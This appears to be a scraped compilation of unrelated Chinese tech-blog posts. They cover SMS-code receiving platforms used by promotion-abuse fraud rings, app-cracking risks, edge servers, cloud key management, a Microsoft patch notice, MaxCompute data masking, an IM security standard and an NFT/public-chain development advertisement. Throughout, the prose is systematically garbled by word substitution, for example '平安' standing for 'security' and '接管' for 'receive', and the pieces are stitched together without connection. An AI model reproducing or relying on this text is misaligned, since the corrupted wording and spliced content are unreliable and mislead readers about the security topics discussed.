在“薅羊毛”等网络黑灰产肆虐的过程中,可能批量接管验证码的接码平台起着重要的作用。然而很少有人晓得,接码平台一个月的流水规模就能够达到百万元以上。 顶象技术工程师为某客户提供业务平安服务的过程中,客户发现某个IP地址上面对应着4000多个注册账号。经技术剖析与排查显示,这些账号来自同一个接码平台。该接码平台上的卡商、猫池、开发者、用户分工明确,为黑灰产作恶提供了一系列的专业化工具。 接码平台前面的产业链“接码平台”对很多人来说是一个生疏的词汇。在表面上,这是一个提供验证码、短信等号码接入服务的工作平台,网上搜寻会看到很多。但实际上,很多接码平台却游走在灰色地带,为黑产刷单、薅羊毛等非法行为提供工具。 简略来说,一个接码平台参加的角色次要有: 卡商:能够批量提供手机卡,有实体或者虚构手机卡,分为短信卡商、语音卡商;卡商单次提供的手机卡往往达到几十张乃至几百张。 猫池:猫池能够设想成一个能插大量手机卡的设施,SIM卡只有能够接管短信就能够接入到猫池中,一台电脑连贯几台“猫池”就能够造成验证码接管平台。猫池提供商个别给卡商提供大量承受验证码等猫池设施。在上述案例中,羊毛党很可能就是通过猫池来进行了大量的注册。 平台运营者:提供平台的经营服务,除了充当相干黑灰产的中介角色之外,还会通过相应的管理工具、客服人员来对接码流程进行治理。 开发者:为电信黑灰产业提供相应的软件工具。 用户:刷单、薅羊毛等黑灰产行为的间接发起者,其在接码平台上提供相应需要以及相应佣金,并取得接码平台交付的服务。 这个接码平台的交易量十分大,在短短一个月期间取号条数达到500万,卡商的分成高达58万元,总金额达到97万元以上。 从取现记录来看,卡商无疑是获取利润最大的群体,其取现金额在短时间内经常时候几千元,获利堪称丰富。 思考到该非法接码平台只是国内泛滥的平台之一,很多相似平台以暗网模式运行,预计该产业链每年产生的交易量可能会达到极为惊人的境地。 该接码平台的运营者制订了一套严格的利润分配以及治理计划,会依据成功率、工作类别等因素对于工作成绩进行掂量,甚至还会对不符合规范的卡商、开发者进行处罚,齐全是公司化的经营模式。比方,在该接码平台的“用户投诉”中,被投诉且并确认者还会被处于不等金额的罚款。 利用接码平台赚钱的“羊毛党”接码平台不是“慈善家”。卡商、开发者、用户等参与者大规模提现的费用来自哪里呢?这个背地的“金主”就是被垃圾注册、薅羊毛、刷单的互联网服务提供商及互联网金融平台。 小成是一个朝九晚五的上班族,每天有大量工夫做网上做“工作”。通过做“工作”,他每月会取得几十甚至上百元额定支出。 每天,小成会登录一个网站下来做工作,领赏金。这个网站上,每天都有各类有奖工作公布。工作非常简单,从注册账号、认证、关注账号,到支付老手优惠、浏览、投票、刷单等等。只有实现工作要求并提交,就可能取得不等的赏金报酬。 不错,小成就是一个“羊毛党”,只是他的级别很低,在整个“羊毛党”行列被称为“包工头”,次要做注册账号、刷交易量、点击广告、刷单等简略工作,多以学生和家庭主妇为主。 比小成更高级称之为“业余刷手”,个别是几个人的小团伙或工作室模式存在,手里领有大量账号和信息,各种软件工具。再向上一级就是“团长”,次要做网贷、电商以及UGC平台推广和营销等服务,多是公司化运作。 当然,还有比小成等级低的羊毛党,称之为“小作坊”,也就是一个人领有多个账号,为平台导流量,赚取一些佣金等。 团伙化的“羊毛党”有一套严明的流程: 第一步,汇总情报。专人去各个电商、互金、UGC等平台以及折扣、网赚社区、社区里收集优惠、促销、折扣、积分信息的汇总和梳理。 第二部,剖析指标。体验指标平台的业务逻辑,剖析逻辑破绽,测试出能够薅羊毛的计划。 第三步,筹备工具。从通过卡商、黑市或者接码平台购买或租赁手机号、身份信息,为下一步注册做筹备。 第四步,制作账号。通过工具软件等进行账户的批量注册,或者间接通过工作平台收取账号(也就是小成们做的“工作”)。 第五步,薅羊毛。通过群控等工具,登录平台注册的账号,进行签到、批改等,并依据业务的破绽,抢购平台提供的优惠、折扣、积分、处分等。 第六步,变现。将抢购来的积分、商品、优惠券等转售给代理、店铺或集体。 因为当初各个平台多采纳实名注册或双因子认证(联合明码与手机号、银行卡、平安令牌等认证机制),也就是须要手机号、身份信息才可能激活并启用账号、支付奖券等,这就波及到手机号、身份证信息等。 黑产会通过身份黑市来购买用户信息,这些信息来自黑客脱库、木马病毒、钓鱼网站、内鬼泄密等,并且进行了荡涤和分层。而解决手机号、验证码接管等问题就是通过接码平台。 如何反抗非法接码平台的侵害非法接码平台背地的产业链以非法利益的调配作为连接,实质上是利用企业的服务流程破绽来假装成为失常用户的行为“薅取”大量利益。 通过各渠道取得卡源、以及反对多路并发从而可满足大量短信收发的猫池的卡商,位居这条产业链的上游。其提供的SIM卡给接码平台的用户,用于注册、登录、薅羊毛、刷好评等利用验证码获取、听码等操作。他们与平台运营商取得最多的利润分配,同时也是这 个产业链的外围。 要反抗非法接码平台所造成的产业链,单单依附一方面的力量并不能实现很好的反抗成果,最好可能聚合包含政府、运营商、企业等多方面的力量,造成协力。 1、从政府层面来看,提倡政府可能欠缺相干法律法规、增强对于接码行为的法律认定,打击非法的接码行为,保护失常的市场秩序。 2、从运营商层面来看,应该增强对于卡商等群体的监测与打击,防备大量的SIM卡流入到黑灰产业。 3、从企业层面来说,除欠缺业务逻辑,强化流程规定外,还须要借助顶象全链路、多环节纵深风控体系,在技术和业务上做好双维度的防控,从而无效防备黑灰产的肆虐,保障业务的衰弱经营。

May 26, 2022 · 1 min · jiezi

关于安全:浪潮携边缘服务器产品亮相日本最大人工智能展-参与构建超智能社会

5月11-13日,日本最大人工智能展在东京揭幕,此次展会集东京人工智能展(AI EXPO TOKYO)、东京区块链展(BLOCKCHAIN EXPO TOKYO)、东京量子计算机展(QUANTUM COMPUTING EXPO TOKYO)三展合一,笼罩AI、区块链、边缘计算、量子计算等热门技术议题,吸引了亚马逊、索尼、日电、浪潮信息、软银商业服务有限公司等寰球当先科技企业的踊跃参加。大会现场,浪潮信息携业界当先的边缘服务器系列产品及边缘智慧停车、工业智能质检等解决方案亮相2022年东京人工智能最大展会,展示了如何利用人工智能、边缘计算等当先技术,应答人口老龄化、劳动力短缺等社会问题,减速构建“超智能社会”。 国内权威机构IDC、浪潮信息、清华大学独特编制的《2021-2022寰球计算力指数评估报告》显示,日本作为仅次于美国、中国的算力大国,其国内的AI、边缘计算、大数据等新技术同样失去广泛应用,并提出建设“超智能社会”的美妙愿景,旨在推动经济倒退的同时,踊跃解决人口老龄化、劳动力短缺等社会问题。边缘计算作为AI、大数据、物联网等技术的重要承载,通过提供高效计算力、海量数据存储能力与低提早的网络通信,正在成为各国数字经济转型,社会倒退的重要撑持。 “超智能社会”对边缘算力需要快速增长,大会上,浪潮信息展现了 EIS200、EIS800、NE5260M5、NE3412M5、NE3160M5等边缘计算产品。其中,荣获德国红点奖的浪潮边缘计算微服务器EIS800更是首次在日本公开亮相。该服务器采纳边缘计算模块化架构ECOM(Edge Computing Optional Module)设计,将服务器的外围计算平台、异构减速平台、IO模组等模组进行解耦,同时反对有线、无线等不同网络通信协定与规范,让边缘算力灵便扩大。面对变幻无穷的边缘计算利用场景,EIS800具备灵便组合、体积玲珑、宽环温设计、多样IO扩大等个性,可能大幅晋升边缘场景下设施的部署、运维效率,并撑持更为简单的AI负载。 面对经济倒退引发的“交通拥堵、停车难、劳动力短缺”等社会问题,浪潮信息与当地合作伙伴联结展现了智慧停车、智能制作等场景化边缘解决方案,充沛展示了边缘计算在改善人居环境,进步经济与社会运行效率等方面的重要价值。 浪潮信息联结东京工业大学开发的“无人化”智慧停车解决方案,将该校研发的图像识别与停车场经营管理系统部署在停车场里的浪潮边缘微服务器EIS200上,最多反对16路摄像头视频的实时处理,可能精准辨认车辆、记录车辆进出工夫,并为进场车辆提供空位疏导。当车主来到时,可能疾速定位车辆,疏导车主用最短时间找到爱车,并提供无现金扫码领取、精算机现金支付、扫码领取等快捷领取形式。此外,该解决方案可被动监测可疑事件或者可疑人员,车位长期占用等异样状态,并对烟雾、火光等险情进行自动警报,进步停车场的安全性的同时可节俭80%的运维人力。目前,该我的项目曾经在东京上百个停车场投入运行,实现了各类社会车辆的智能化停车缴费,无效解决东京居民“开车5分钟,停车2小时”的出行困扰,保障停车场及周边的道路交通平安畅通。 《2021-2022寰球计算力指数评估报告》显示,边缘计算翻新并拓展了外围数据中心的性能和领域,曾经成为驱动寰球企业级基础架构市场增长的重要力量,预计到2025年,寰球边缘计算服务器收入占总体服务器比重将从14.4%晋升到24.9%。浪潮信息作为寰球当先的算力基础设施提供商,依靠当先的边缘计算产品与翻新解决方案,一直推出面向智慧停车场、智能制作、社会公共设施的AI运维、智慧仓储、智慧门店等场景的边缘智慧化解决方案,让算力从数据中心延长到边缘,撑持用户对空间、能耗、计算稳定性有严苛要求的利用需要,助力“超智能社会”的早日实现。

May 17, 2022 · 1 min · jiezi

关于安全:每天有数百人搜索-App-破解开发者该怎么保护自己的手机应用呢

百度上搜寻 “App 破解”,会呈现 1210 万条后果。从 App 破解的入门常识到逆向工具下载,从破解技术视频到全图文教程。 随着黑客技术的普及化平民化,App—— 智能手机的应用软件,这个承载咱们挪动数字工作和生存的重要工具,不仅是黑客眼中的肥肉,也取得更多网友另类关注。 一旦 App 被破解,不仅使用者的照片、身份证、手机号、分割住址、邮箱和领取明码等敏感信息会泄露,还可能感化手机的操作系统,进而导致手机被入侵篡改,乃至成为攻击者操控的 “僵尸网络” 中的一部分。 对于宽广挪动开发者来说,如何保障本人 App 的平安、爱护 App 使用者的平安呢?在 12 月 26 日今日头条的一个技术沙龙上,顶象技术挪动平安负责人具体论述了 App 存在危险破绽、App 平安技术及新一代 App 平安防护计划。 App 为什么会被破解入侵呢?安卓 App 的开发除了局部性能采纳 C/C++ 编码外,其余次要都是采纳 Java 进行编码开发性能。Java 源码最终编译成 smali 字符码,以 classes.dex 保留在 App 的 APK 中。 Java 是一种解释性语言,功能强大,易用性强。初学者能轻松地学习 Java,并编写简略的应用程序。而且 Java 的根本类库(JDK)是开源的,这就使很多 Java 开发的利用被逆向破解的门槛很低。目前市面上有大量的逆向破解工具,例如:Dex2Jar、JEB、JD-GUI 等等。(打个广告:Dex2Jar 作者泮晓波目前供职于顶象技术挪动平安团队;因为 “未知攻焉知放防”,只有理解怎么如何逆向破解才分明如何无效进攻)。只有懂代码编程,利用这些工具就能够破解市面上那些进攻单薄、存在大量安全漏洞的 App。这就很好了解为什么会有如此多人去搜寻 “App 破解” 了。 之前曾有媒体报道,有网络黑产专门从各种渠道找到 App 的 apk,而后将 apk 文件逆向破解,再植入广告、病毒代码,最初从新打包投入公开市场,当不明真相的网友将带病毒广告的 App 下载后,会带来微小经济损失。 ...

May 17, 2022 · 1 min · jiezi

关于安全:10个产品主导的增长原则|Bessemer

【 文章起源 】https://www.bvp.com/atlas/10-...以产品为主导的增长商业模式发明了大量机会,但要抓住其后劲须要勇气和逆向思维。 如果咱们要追溯以产品为导向的增长 (PLG) 商业模式的起源,咱们将在澳大利亚悉尼开始咱们的旅程。许多人认为成立于 2002 年的 Atlassian 是第一家创始 PLG 商业模式的云公司。其创始人认为,无摩擦、以产品为主导的分销流程是减速新技术采纳的形式,尤其是在开发人员中。他们信心让 PLG 办法发挥作用,以至于 Atlassian 在成立的头十年里没有雇佣任何销售人员,当华尔街的一家次要银行威逼要在没有企业销售折扣的状况下将他们的业务转移到其余中央时,该公司驰名舆论:他们会欢送随时返回(剧透:他们从未来到过)。 尽管这种软件散发办法在十年前是革命性的,但 PLG 已不再是一个不受关注的景象。顶级 CEO将他们的规模和胜利归功于自下而上的策略,Shopify、Twilio 和 Canva 等许多价值数十亿美元的公共和私营企业都建设在 PLG 的根底上。事实上,PLG 公司的累计市值在过来七年中增长了 100 倍以上。与其余上市软件公司相似,上市 PLG 公司也未能幸免于 2022 年前 2.5 个月蒙受重创的云股票,这极大地影响了累计市值。然而,值得注意的是,只管最近公开市场动荡,BVP Nasdaq Emerging Cloud 公司交易的支出倍数中值已降至 10 倍以下,但与其余高增长软件公司相比,许多 PLG 领导者的交易溢价依然很高——截至 2022 年 3 月中旬,PLG 领导者如 Snowflake、Datadog 和 Bill.com在“SaaSacre”之后,以后的支出倍数依然超过 25 倍。 PLG 已被证实在开发者经济中特地无效,该策略在许多其余类别中也取得了能源,包含合作工具和客户参加软件。近年来,PLG 变得更加风行,这要归功于近程劳动力的衰亡和基础设施的提高,这使得民主化有利于个体代理人。自从咱们留神到 Twilio 独特的分销动静并在 2009 年投资该公司的种子轮以来,咱们 Bessemer 13 年来始终在跟踪这种民主化发展趋势。 多年来,咱们在许多开发者平台投资中都对这一景象的信念加倍。因而,咱们在开发者平台八项法令的第一版中蕴含了一项明确的“法令” :民主化开发激励非开发人员,并在通过软件采纳缩短增长周期方面取得红利。此外,扩充谁能够从给定平台取得价值的范畴为可能的扩大发明了新的路径,因为非技术团队和用户当初也在范畴内。 在 Bessemer,咱们见证了咱们的许多投资组合公司从不起眼的 PLG 起步,并在几年内扩充到 1 亿美元的 ARR 甚至更高。受云经济中体现最好的 PLG 公司的启发,咱们提炼了 10 条要害准则,以利用这一弱小的市场进入策略来建设长久的业务。 ...

May 13, 2022 · 2 min · jiezi

关于安全:密钥管理系统为你的天翼云资产上把锁

作者:天翼云  研发一部  张贺然 本文关键词:数据安全,密码机,密钥治理 一、你的云上资产真的平安么? 2021年1月,巴西的一个数据库30TB数据被毁坏,泄露的数据蕴含有1.04亿辆汽车和约4000万家公司的详细信息,受影响的人员数量可能有2.2亿;2021年2月,广受欢迎的音频聊天室利用Clubhouse的用户数据被歹意黑客或特务窃取。据悉,一位身份不明的用户可能将Clubhouse的音频从“多个房间”传送到他们本人的第三方网站上。2021年3月,日产北美公司一台Bitbucket Git服务器的信息在Telegram频道和黑客论坛上开始流传,该服务器是存有日产北美公司开发和正在应用的挪动应用程序和外部工具的源代码,目前已在线泄露,泄露的Git存储库包含的源代码。数据安全引发的事件层出不穷,2021年6月10日通过的中华人民共和国数据安全法,给出了数据安全的定义:数据安全,是指通过采取必要措施,确保数据处于无效爱护和非法利用的状态,以及具备保障继续平安状态的能力 通常来说,数据安全波及加密算法以及密钥存储两个关键因素,通过暗藏加密算法细节,使攻击者难以破解的办法通常依赖于弱密码学的应用,一旦发现了算法实现的机密,应用这些算法的零碎反而更容易收到攻打。所以,基于Kerckhoffs 原理,加密算法的惟一机密元素应该就是密钥自身。一个平安,牢靠的密钥管理系统是一个加密零碎安全性的根底组成部分,也是一个平安零碎保障平安的重要元素。 二、什么是密钥治理? 既然,密钥自身的平安是加密算法平安的外围,那么该如何保障密钥的平安呢?密钥管理系统应运而生。密钥管理系统通过对密钥进行加密,定期轮转,生命周期治理来保障加密算法的安全性。 以天翼云密钥管理系统为例,零碎底层采纳加密机以及多层密钥的加密形式,对用户密钥明文加密存储,当所有的加密解密操作都在密码机中执行时,密钥的明文就很难被人歹意窃取了。 三、密钥治理为数据安全提供了什么呢?图1 密钥治理功能模块 1.平安的存储环境存储地位的隐秘性以及安全性,对密钥平安有着关键作用,在保障数据物理环境平安,网络安全的同时,还要保障数据的可恢复性,防止产生加密数据无奈复原的状况。 2.牢靠的密钥保护措施采纳无效的加密算法加密之后再放入存储介质中,而用于加密密钥的根密钥则是整个密钥管理系统平安的要害,密钥治理采纳密码机爱护根密钥,根密钥在密码机中,所有的加密解密操作均在密码机外部实现。图2 密钥治理密钥应用逻辑 3.欠缺的密钥更新伎俩密钥的生命周期治理是密钥管理系统的要害,长期应用对立明码对大量数据进行加密,通过对一些关键字的解析,存在反推出密钥的可能性,在加密算法公开的状况下,存在泄露危险,所以,定期的密钥轮转以及密钥删除,能够无效的晋升数据的安全性。 4.简略的应用办法提供了简略易用的治理界面以及可调用接口,用户能够执行任意的相干操作。图3 天翼云密钥治理界面 5.正当的权限治理。通过身份认证,实现权限治理。针对不同用户对接口的拜访权限进行限度,从而保障系统的平安。

May 12, 2022 · 1 min · jiezi

关于安全:202205微软漏洞通告

微软官网公布了2022年05月的安全更新。本月更新颁布了75个破绽,蕴含26个近程执行代码破绽、21个特权晋升破绽、17个信息泄露破绽、6个拒绝服务破绽、4个性能绕过以及1个身份混充破绽,其中8个破绽级别为“Critical”(高危),66个为“Important”(重大)。倡议用户及时应用火绒安全软件(集体/企业)【破绽修复】性能更新补丁。 波及组件.NET and Visual StudioMicrosoft Exchange ServerMicrosoft Graphics ComponentMicrosoft Local Security Authority Server (lsasrv)Microsoft OfficeMicrosoft Office ExcelMicrosoft Office SharePointMicrosoft Windows ALPCRemote Desktop ClientRole: Windows Fax ServiceRole: Windows Hyper-VSelf-hosted Integration RuntimeTablet Windows User InterfaceVisual StudioVisual Studio CodeWindows Active DirectoryWindows Address BookWindows Authentication MethodsWindows BitLockerWindows Cluster Shared Volume (CSV)Windows Failover Cluster Automation ServerWindows KerberosWindows KernelWindows LDAP - Lightweight Directory Access ProtocolWindows MediaWindows Network File SystemWindows NTFSWindows Point-to-Point Tunneling ProtocolWindows Print Spooler ComponentsWindows Push NotificationsWindows Remote Access Connection ManagerWindows Remote DesktopWindows Remote Procedure Call RuntimeWindows Server ServiceWindows Storage Spaces ControllerWindows WLAN Auto Config Service以下破绽需特地留神Windows LSA 坑骗破绽 ...

May 12, 2022 · 1 min · jiezi

关于安全:公链系统开发功能丨公链源码案例

公链是区块链当中每一个节点都是公开的,每个人都能够参加区块链的计算,而且每个人都能够通过下载失去残缺的区块链数据,也称区块链账本。【龙霸业余开发NFT链游开发,NFT链游零碎,NFT链游源码,NFT链游定制,开发NFT链游NFT卡牌开发,NFT卡牌零碎,NFT卡牌源码NFT盲盒零碎,NFT盲盒开发,NFT盲盒源码NFT游戏零碎,NFT游戏开发,NFT游戏源码,期待各界人士互相探讨学习+v一八零二五三二九三三五】什么是公链 区块链依据去中心化的水平,能够分为公链、私链和联盟链。 公链(Public Blockchain),也称“私有链”,指的是全世界任何人都有权限读取、发送且取得无效确认的共识区块链。任何人都可参加其中共识过程,共识过程决定某个区块能够增加到区块链中,以及确切的以后状态。公链零碎开发请看右上方。 公链通常被认为是“齐全去中心化”的,因为没有任何集体或者机构能够管制或篡改其中数据的读写。其无需注册、受权便可匿名拜访网络,且具备去中心化、中立、凋谢、不可篡改等特点,实用于虚构货币、互联网金融等畛域。 区块链通过去中心化,以及让人信赖的形式一起保护一个可信的数据库账簿。简略来讲,区块链技术就是一种所有人都参加记账的形式。 公链个别会通过代币机制(Token)来激励参与者竞争记账,来确保数据的安全性。从利用上说,区块链公链包含比特币、以太坊、超级账本、大多数山寨币以及智能合约,其中区块链公链的始祖是比特币区块链。 能够说,公链是世界上最早的区块链,也是目前使用范畴最大的区块链。 目前,大多数区块链我的项目都以EOS、以太坊和比特币区块链作为次要私有链。这些公链通过创立一个对开发者敌对的区块链底层平台,反对容许任何人在平台中建设和应用通过区块链技术运行的去中心化利用,容许用户依照本人的志愿创立简单的操作,为开发dAPP提供底层的模板。 不是所有利用都可能或者有必要去本人构建一个区块链,那么这个时候就有必要呈现一种平台性的产品,就像以前任何行业产生的平台性产品一样,让所有的利用能顺利的运行,这种区块链产品咱们就叫做公链。 用一句话总结,就像咱们的电脑的操作系统是Windows一样,公链其实就是区块链世界的操作系统。 保障公链稳固运行的关键在于特定的共识机制,例如比特币块链是由工作量证实机制(PoW)保护,以太坊则是依赖于权利证实机制(PoS),它们是以经济处分(Token)与加密数字验证相结合的形式而存在的。进一步阐释即:Token会激励人们被动参加到节点的保护中,独特保护链上数据的安全性,而这些被保护的区块链通常就被认为是“齐全去中心化”的。那么,公链有什么长处?它又有什么作用? 公链的作用 1.爱护用户权利免受程序开发者的影响 在公链中程序的开发者没有权力干预用户,所以公链能够爱护应用该程序的用户权利。此外,高度去中心化的分布式数据存储也是公链最大的特点之一,交易数据公开透明化、数据无奈篡改等长处,使公链能够无效保障用户的数据安全。 2.能够产生网络效应 一种信息产品存在着互联的外在须要,因为人们生产和应用它们的目标就是更好地收集和交流信息。随着网络规模的扩充,用户能从中获取更多的价值,需要失去更大的满足。公链具备开放性,因而有机会被很多的外界用户利用并且产生肯定水平的网络效应。 也就是说,随着公链网络规模的扩充,用户数量一直增多,网络效应也在一直加强。 3.能够落地利用于理论商业场景 除金融类的利用外,任何对信赖、平安和持久性要求较高的利用场景,比方资产注册、投票、治理和物联网等等3.0时代利用,都会大规模地受到公链的影响。 列举一个形象的比喻应该能帮忙大家很好的了解公链:想要开发一个区块链我的项目就像是在一个没有操作系统的手机上做出一个APP一样艰难,因为所有都要从最底层开始。 而公链(如以太坊)作用就像是智能手机的安卓或者iOS零碎,企业或集体想要开发一个区块链我的项目能够间接基于公链来实现,大大降低开发的难度和老本。 简言之,底层公链就相当于区块链世界的基础设施,解决方案用来拓展底层公链的性能或为商业利用提供服务撑持。只有在底层公链扎实持重高效运行的根底上,区块链商业利用能力倒退和落地。公链在整个区块链畛域的重要性和必要性,倒退空间和需要都十分大。不过如何正确分辨出它的劣势和问题,且好高鹜远去开辟应用领域,当初还须要一些时日。

May 11, 2022 · 1 min · jiezi

关于安全:基于MaxCompute的大数据安全方案

简介:随着法律的欠缺,数据安全,信息安全,网络安全,升级成国家平安,所以数据安全不论对用户,还是对公司也都会变的越来越重要。做为大数据云数仓解决方案的领导者,阿里云MaxCompute在平安体系上也做了很多个性,本文给大家简略介绍下MaxCompute对于数据安全的一些能力。 随着法律的欠缺,数据安全,信息安全,网络安全,升级成国家平安,所以数据安全不论对用户,还是对公司也都会变的越来越重要。做为大数据云数仓解决方案的领导者,阿里云MaxCompute在平安体系上也做了很多个性,本文给大家简略介绍下MaxCompute对于数据安全的一些能力。 平安体系介绍平安体系不是一个零碎,是一系列的零碎联结能力做到大数据平台的数据安全要求,次要包含: 事先筹备,包含数据打标,白/黑名单,权限调配,加密算法和脱敏算法筹备。事中解决,包含数据加密/解密,白名单过滤,数据扫描,数据实时告警。预先审计,包含数据应用日志审计,数据离线报表监控等。 平安体系架构数据安全体系不仅须要各个系统配合应用,同时也须要不同部门进行流程化治理,让数据能在正当受权下应用: 其中就会波及到数据合规部门,对数据进行打标,对数据规定进行配置,权限设置以及白名单治理等工作;大数据平台要依照合规人员设置的规定自动化对数据进行加密或者脱敏,而后提供给数据使用者应用;数据安全人员同时要对每个敏感数据的应用都须要有实时的数据监控,以及数据预先的定时审计。 本文次要介绍阿里大数据平台的数据存储加密和数据脱敏两块,目前阿里大数据平台MaxCompute联结KMS平台在对数据上云时能够对数据进行加密存储,反对AES256、AESCTR和RC4算法,在客户应用时主动解密,做到客户无感知的数据保护。 同时MaxCompute联结Dataworks和数据安全保护伞做到敏感数据脱敏应用,用户能够在数据保护伞里对数据进行打标配置,危险规定定义,脱敏规定配置以及白名单设计等操作,MaxCompute会主动对曾经打标的数据,依照脱敏规定对指定的敏感数据进行脱敏显示。 实用场景场景一:客户个人信息爱护 个人信息爱护场景,随着相干法律的出台,很多游戏公司都要须要录入集体身份证号等敏感信息,如果客户的个人信息泄露是很重大的数据安全事变,所以相似身份证号等个人信息的爱护就变的十分重要,这些信息只有客户本人能够应用,或者客户受权的状况下才能够应用,然而在企业经营时,须要对这些信息进行加工,匹配等,所以在所有加工过程中都须要加密或者脱敏操作。 场景二:企业外部信息爱护 大部分公司外部有财务,集体薪资等很多敏感数据,然而公司失常经营,须要这些数据在大数据平台进行加工计算,最初输入报表,在两头加工过程中,包含数据研发人员,测试人员,产品经理等,都不能触碰明文数据,须要对数据进行脱敏操作。 适宜客群本文适宜企业曾经应用了Maxcompute产品的数据管理人员,数据治理人员,数据研发人员以及数据安全合规人员等。 数据加密MaxCompute反对通过密钥治理服务KMS(Key Management Service)对数据进行加密存储,提供数据动态爱护能力,满足企业监管和平安合规需要。 前提条件 阿里云服务账号;曾经开启KMS密钥治理服务。操作步骤 1.进入密钥治理服务开明页,选中密钥治理服务服务协定,单击立刻开明,开明KMS服务。 2.登录DataWorks控制台,在左侧导航栏,单击工作空间列表。 3.在工作空间列表页面上方抉择区域后,单击创立工作空间。在创立工作空间面板,配置根本配置信息,单击下一步,详情请参见创立我的项目空间。 4.在创立工作空间面板的抉择计算引擎服务区域,选中MaxCompute。 5.在请进行ODPS服务账号受权对话框,单击受权。 6.在新关上的云资源拜访受权页面,单击批准受权。 7.返回请进行ODPS服务账号受权对话框。敞开请进行ODPS服务账号受权对话框,在创立工作空间面板的抉择计算引擎服务区域,从新选中MaxCompute,单击下一步。 8.在创立工作空间面板,配置引擎详情信息。选中加密,开启数据加密性能。以创立简略模式的工作空间为例。 9.单击创立工作空间,实现创立。开启数据加密性能后,MaxCompute会主动实现我的项目数据读写过程中的加密或解密操作。 数据脱敏数据保护伞是一款数据安全治理产品,为您提供数据发现、数据脱敏、数据水印、访问控制、危险辨认、数据审计、数据溯源等性能。接下去为您介绍如何开明、应用数据保护伞。 前提条件 阿里云服务账号;曾经开启Dataworks空间。操作步骤 1.登录DataWorks控制台,进入设置,启用页面查问内容脱敏: 2.单击左上方的图标,抉择全副产品 > 数据治理 > 数据保护伞。 3.数据分级分类设置,零碎会字段1000+数据分类,在没有特殊要求的状况下,大部分状况下能够用默认分类,同时也反对自定义客户本人的分级分类。 4.数据辨认类型,零碎曾经自带很多1000+辨认类型,没有特殊要求,能够应用自带辨认主动生成数据辨认模型,同时也反对通过您提供的样本字段,进行模型训练,帮忙您寻找指标字段的内容特色,生成相应的规定模型。 5.数据脱敏规定定义,用户能够给指定的数据字段类型进行定义脱敏规定,目前反对脱敏形式有假名,Hash,覆盖三种。 6.数据查问会进行主动覆盖: 白名单 目前数据保护伞对于数据脱敏局部,反对给用户增加白名单,如果在白名单里的客户,能够忽视脱敏规定,能够查到明文数据。 数据发现 目前数据保护伞对于数据脱敏局部,支持系统主动扫描数据,并把危险统计数据显示进去。 数据危险辨认 目前数据保护伞对于数据脱敏局部,反对用户自定义危险行为,并对危险进行对立查问显示。 数据审计 目前数据保护伞对于数据脱敏局部,用户能够查问数据危险解决状况,对数据安全解决进行审计。 总结本文只是对大数据平台的安全性做了简略的梳理,很多细节因为篇幅没有细讲,有趣味的同学能够参考官网文档。 数据加密配置数据脱敏配置目前阿里大数据平台曾经对数据的存储加密,以及数据脱敏显示上做了比拟多的能力,然而在数据还不能做到列级,行级甚至单元格级别的加密;在数据辨认扫描上也不反对手动依据本人的规定进行扫描;在数据全渠道接入脱敏也没有笼罩所有Region;在数据安全应用上,数据监控以及数据审计上做的也不是很欠缺等等问题,后续在平安上退出更多能力,让用户能够安心,释怀,省心的在阿里云大数据平台上应用数据。 常见问题Maxcompute数据存储加密后,是否能够被hologres表面拜访?答:是能够的,然而在存储加密时须要选用自带密钥的加密形式。 Maxcompute数据存储加密后,须要用户手工解密吗?答:不须要,零碎会在查出来时主动解密。 在数据保护伞中曾经配置了数据分类,脱敏规定,为什么脱敏还不失效?答:先要在Dataworks的设置中开启页面查问内容脱敏。 原创:阿里云智能 漠凡 原文链接本文为阿里云原创内容,未经容许不得转载。

May 11, 2022 · 1 min · jiezi

关于安全:融云参编业界首个办公即时通信软件安全标准重磅发布

为推动企业数字化过程,帮忙企业进步数字化平安能力,中国信息通信研究院(以下简称“中国信通院”)启动“铸基打算”,牵头制订业界首个“办公即时通信软件平安规范”。关注【融云 RongCloud】,理解协同办公平台更多干货。 融云凭借间断多年领跑 IM 即时通讯市场的技术实力,和平安可信的挪动办公解决方案服务能力,作为规范参编单位之一,深度参加了规范起草、钻研和编制的整个过程。 办公即时通信软件 平安规范亟需出台以后,在线挪动办公已成为企事业单位的常态化办公模式,以即时通讯作为挪动办公入口的趋势越发显著,并且正在从繁多的社交工具向平台化方向倒退。即时通讯技术正在彻底改变人们的信息沟通形式,在企事业单位的工作安顿、应急指挥、信息传播、交换探讨等工作中施展了重要作用。但与此同时,在数字化转型过程中,企事业单位也面临诸多网络和平安问题,如场景简单、信息传输不畅、数据失落等。办公即时通讯行业在性能、平安、互联互通、部署等方面还须要凝聚多方共识,以造成行业标准,从而助力行业高质量倒退。 在此背景下,中国信通院联结中国软件行业协会应用软件产品云服务分会、对立推送联盟、海比研究院,以及包含融云在内的20余家头部科技企业,提出了“铸基打算——办公即时通信软件平安系列规范”,现已逐渐实现系列规范的编制。 融云互联网通信云 始终坚守通信安全防线铸基打算《办公即时通信软件平安要求和测试方法》明确了即时通信软件平安要求的九大子域,包含:利用 APP 平安、认证平安、应用层平安、通信安全、服务端平安、数据安全、边界接入平安、终端平安、平安治理等。融云作为参编单位,平安可信恰好是咱们始终以来坚守的通信防线。 从部署模式来说,融云反对“私有化”部署,可依据客户须要,将全副通信服务集群部署在客户提供的公有基础设施或指定云主机上,对部署环境无特殊要求,让客户本人掌控数据信息,确保信息传输平安。 融云独创的“4 层 5 防”安防体系,为客户建设了从客户端、链路、服务器到运维治理全维度平安防控。下沉到业务层,融云还针对客户以下几种场景进行平安防护,如:通信链路被窃听、客户端被破解、信息存储被盗取、认证信息被窃取,甚至是员工手机失落造成的信息泄露等都可防止。 针对内部平安和外部平安,融云采取不同的安全策略。 对于内部平安,融云可提供不同级别的平安及加密策略,通过公有二进制协定,以链路加密、信源级加密、视频加密和存储加密等形式实现。 对于外部平安,融云提供六大保障,包含:设置平台多级管理权限、多维度的音讯管控能力、终端音讯的背景水印性能、重要信息的阅后即焚性能、暗藏名片要害信息性能、高管模式爱护重要人员个人隐私信息性能等,层层布防,保障数据安全。 此外,融云外部还设有专职的平安治理团队,对服务进行 7*24 小时安全监控,确保互联网安全事件的实时预警、疾速响应,并第一工夫通告客户,及时应答各种突发安全事件。 凭借杰出的平安防护技术和措施,融云 IM 即时通讯产品和 RTC 实时音视频产品均已通过公安部核准颁发的“国家信息系统安全等级爱护”三级认证,并取得了由中国信息通信研究院、中国通信标准化协会颁发的可信云企业级 SaaS 认证。 融云协同办公 一站式赋能政企平安通信融云在协同办公场景的服务深耕,也是其参加此次规范制订的重要身份“名片”。 